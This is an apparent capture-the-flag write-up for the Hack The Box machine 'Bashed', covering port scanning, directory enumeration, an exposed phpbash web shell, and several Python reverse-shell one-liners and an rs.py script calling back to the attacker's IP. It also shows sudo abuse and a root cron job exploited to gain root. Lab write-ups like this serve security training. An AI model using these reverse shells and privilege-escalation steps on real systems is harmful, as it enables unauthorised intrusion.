Bashed

Back

Ports scan

root@kali:~/HTB/Machines/Bashed# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.68 --rate=1000


Starting masscan 1.0.5 at 2019-11-25 18:16:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.68

nmap

root@kali:~/HTB/Machines/Bashed# nmap -A -T4 -v 10.10.10.68
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 13:16 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating NSE at 13:16
Completed NSE at 13:16, 0.00s elapsed
Initiating Ping Scan at 13:16
Scanning 10.10.10.68 [4 ports]
Completed Ping Scan at 13:16, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:16
Scanning bashed.htb (10.10.10.68) [1000 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed SYN Stealth Scan at 13:16, 0.71s elapsed (1000 total ports)
Initiating Service scan at 13:16
Scanning 1 service on bashed.htb (10.10.10.68)
Completed Service scan at 13:16, 6.10s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against bashed.htb (10.10.10.68)
Retrying OS detection (try #2) against bashed.htb (10.10.10.68)
adjust_timeouts2: packet supposedly had rtt of -208236 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208236 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258312 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258312 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258301 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258301 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258392 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258392 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258426 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -258426 microseconds.  Ignoring time.
Initiating Traceroute at 13:16
Completed Traceroute at 13:16, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:16
Completed Parallel DNS resolution of 2 hosts. at 13:16, 0.19s elapsed
NSE: Script scanning 10.10.10.68.
Initiating NSE at 13:16
Completed NSE at 13:17, 0.96s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.18s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.044s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Aggressive OS guesses: Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), Linux 3.2 - 4.9 (94%), Linux 4.4 (94%), Linux 4.8 (94%), Linux 4.9 (94%), Linux 3.8 - 3.11 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Mon Nov 25 13:16:32 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros


TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   42.82 ms 10.10.14.1
2   43.06 ms bashed.htb (10.10.10.68)


NSE: Script Post-scanning.
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Initiating NSE at 13:17
Completed NSE at 13:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
           Raw packets sent: 1116 (54.156KB) | Rcvd: 2725 (111.328KB)

Web Enumeration

root@kali:~/HTB/Machines/Bashed# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.68


 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )


Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562


Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-25_13-23-23.log


Target: http://10.10.10.68


[13:23:23] Starting:
[13:23:24] 403 -  290B  - /.php
[13:23:24] 200 -    2KB - /images/
[13:23:24] 403 -  292B  - /icons/
[13:23:24] 200 -   14B  - /uploads/
[13:23:25] 200 -  939B  - /php/
[13:23:26] 200 -    2KB - /css/
[13:23:31] 200 -    1KB - /dev/
[13:23:31] 200 -    3KB - /js/
[13:23:35] 200 -    0B  - /config.php
[13:23:42] 200 -    2KB - /fonts/
[13:30:06] 403 -  300B  - /server-status/


Task Completed

Phpbash.php

The php file open a shell on the server. We can use it directly or open a reverse shell.

Open a listener

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Launch reverse shell opener from web page

From the webpage: http://10.10.10.68/dev/phpbash.php

Run the following command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The listener opens a shell

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:45076.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/var/www/html/php$ <CRTL Z>
[1]+  Stopped                 rlwrap nc -nlvp 4444
root@kali:~/HTB/Machines/Bashed# stty rows 24 columns 80
root@kali:~/HTB/Machines/Bashed# stty raw -echo
root@kali:~/HTB/Machines/Bashed# fg rlwrap nc -nlvp 4444
www-data@bashed:/var/www/html/php$ export TERM=screen
export TERM=screen

User Flag

From the rs or from the web page, the user flag is available.

www-data@bashed:/var/www/html/dev# cd /home
www-data@bashed:/home# ls
arrexel
scriptmanager
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# cat user.txt
<USER_FLAG>

Privilege escalation enumeration

Open a web server

root@kali:~/HTB/Machines/Bashed# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the reverse shell or the web shell

www-data@bashed:/tmp# wget -q http://10.10.14.34/LinEnum.sh
www-data@bashed:/tmp# chmod 755 LinEnum.sh

On the report some information is important:

• User 1001 uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
• User 1000 uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare) is adm
• User www-data can sudo without password to user scriptmanager

We can sudo without supplying a password!
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

• Home directory rights are lax (we knew it, because we find the user flag
• It seems there is a crontab for root

[-] Anything interesting in /var/spool/cron/crontabs:
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
-????????? ? ? ? ? ? root

Lateral escalation

www-data can run sudo for user scriptmanager

List scriptmanager files

www-data@bashed:/tmp$ find / -user scriptmanager 2>/dev/null
find / -user scriptmanager 2>/dev/null
/scripts
/home/scriptmanager
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.nano
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout

we can list the files

www-data@bashed:/tmp$ sudo -u scriptmanager ls -l /scripts/
sudo -u scriptmanager ls -l /scripts/
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Nov 25 11:05 test.txt

We can see the content of the script test.py

www-data@bashed:/tmp$ sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

The script is very simple, it opens the file test.txt and writes testing 123!. But the file is owned by root.

www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager python /scripts/test.py
Traceback (most recent call last):
  File "/scripts/test.py", line 1, in <module>
   f = open("test.txt", "w")
IOError: [Errno 13] Permission denied: 'test.txt'

As expected, if the script is run with user scriptmanager, it fails because rights fail.

Open a reverse shell

Technically, we can work with user www-data, but it's more confortable to move to another shell for user sriptmanager.

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

From web shell or reverse shell

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And the listener opens a new shell

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:37152.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
scriptmanager
$ python -c 'import pty; pty.spawn("/bin/bash")'
scriptmanager@bashed:/var/www/html/dev$ export TERM=screen
export TERM=screen

User escalation

The rights of the file test.txt are from root, and the Linuxenumeration told us there was a crontab. We can guess there is a periodic task run with user root.

Run pspy

root@kali:~/HTB/Machines/Bashed# wget -q https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32

Be sure our Webserver is still up

root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.68 - - [25/Nov/2019 22:30:25] "GET /LinEnum.sh HTTP/1.1" 200 -

From the www-data console

www-data@bashed:/tmp$ wget -q http://10.10.14.34/pspy32
wget -q http://10.10.14.34/pspy32
www-data@bashed:/tmp$ chmod +x pspy32
chmod +x pspy32
www-data@bashed:/tmp$ ./pspy32
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855



    ██▓███    ██████  ██▓███ ▓██   ██▓
   ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
   ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
   ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
   ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
   ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
   ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
   ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                  ░           ░ ░
                              ░ ░


Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non- recursive)
Draining file system events due to startup...
done
2019/11/25 19:35:42 CMD: UID=0    PID=99     |
2019/11/25 19:35:42 CMD: UID=0    PID=98     |
2019/11/25 19:35:42 CMD: UID=0    PID=94     |
...
2019/11/25 19:35:42 CMD: UID=0    PID=100    |
2019/11/25 19:35:42 CMD: UID=0    PID=10     |
2019/11/25 19:35:42 CMD: UID=0    PID=1      | /sbin/init noprompt
2019/11/25 19:36:01 CMD: UID=0    PID=895    | /usr/sbin/CRON -f
2019/11/25 19:36:01 CMD: UID=0    PID=897    | python test.py
2019/11/25 19:36:01 CMD: UID=0    PID=896    | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done

All scripts with extension py from folder script are executed with user root.

Run listener

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

Create python reverse shell script

root@kali:~/HTB/Machines/Bashed# cat rs.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.34",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Upload rs.py to folder scripts

Be sure our Webserver is still up

root@kali:~/HTB/Machines/Bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.68 - - [25/Nov/2019 22:30:25] "GET /LinEnum.sh HTTP/1.1" 200 -
10.10.10.68 - - [25/Nov/2019 22:34:47] "GET /pspy32 HTTP/1.1" 200 -

From scriptmanager console

scriptmanager@bashed:/var/www/html/dev$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ wget -q http://10.10.14.34/rs.py
wget -q http://10.10.14.34/rs.py

Wait until next execution of the crontab, and own the system

root@kali:~/HTB/Machines/Bashed# rlwrap nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:47616.
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python -c 'import pty; pty.spawn("/bin/bash")'
scriptmanager@bashed:/var/www/html/dev$ export TERM=screen
export TERM=screen

Root Flag

# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>

References

• pspy - unprivileged Linux process snooping
• phpbash
• LinEnum
• https://www.rebootuser.com/

Daniel Simao 20:53, 25 November 2019 (EST)